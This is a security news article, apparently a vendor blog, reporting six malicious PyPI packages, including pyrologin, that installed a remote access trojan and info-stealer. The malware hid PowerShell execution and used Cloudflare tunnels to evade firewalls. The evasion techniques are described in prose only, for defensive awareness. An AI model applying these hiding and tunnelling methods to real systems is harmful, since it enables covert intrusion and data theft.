Researchers discovered that six packages on PyPI, the Python Package Index, are laced with remote access trojan (RAT) and information-stealing malware, and use Cloudflare tunnels to evade firewalls.
The rogue packages’ abilities include keylogging, shell command execution and theft of critical user information from browsers, according to Phylum’s security advisory.
Security experts first detected the malicious content on Dec. 22, 2022, but the perpetrators continued to upload poisoned packages until December 31. The list of compromised packages is as follows:
pyrologin
easytimestamp
discorder
discord-dev
style.py
pythonstyles
The first malicious package detected was pyrologin
; researchers initially believed it was “standard Python malware.” Upon closer inspection, though, they discovered the package also fetched an archive from a third-party website and contained PowerShell commands meant to obfuscate the code.
“One thing that did stick out in this package, however, was the fetching of a zip file from a transfer[.]sh site and some strings that contained PowerShell code with 'SilentlyContinue' and -WindowStyle Hidden in it,” reads Phylum’s announcement. “This looked like a clear attempt to hide whatever code the attacker was trying to execute.”
After retrieving the archive, the script unpacks it on the compromised device and installs a series of requirements to enable screenshot capturing and remote control. The malicious script avoids detection by using the -ErrorAction SilentlyContinue
flag to continue running stealthily, even if it encounters errors.
Included in the archive is a server component that launches four threads:
At this step, the script uses a different Python script included in the archive to install a Cloudflare Tunnel on the victim’s machine. The Cloudflare Tunnel’s abilities let perpetrators make the compromised device remotely accessible without opening ports or configuring firewall rules.
Threat actors combine the firewall-dodging capabilities of the tunnel with a remote access trojan planted on the infected device to:
Although the malicious packages have been removed from PyPI and their publishers have been banned, the threat actors could still find their way back to the repository.
Despite their removal from the platform, they might still be installed on compromised devices. Users who have installed the compromised apps on their machines must remove them manually.
Dedicated software such as Bitdefender Ultimate Security can keep you safe from trojans, info-stealers and other cyber threats with its extensive range of features, including:
tags
Vlad's love for technology and writing created rich soil for his interest in cybersecurity to sprout into a full-on passion. Before becoming a Security Analyst, he covered tech and security topics.
View all postsNovember 14, 2024
September 06, 2024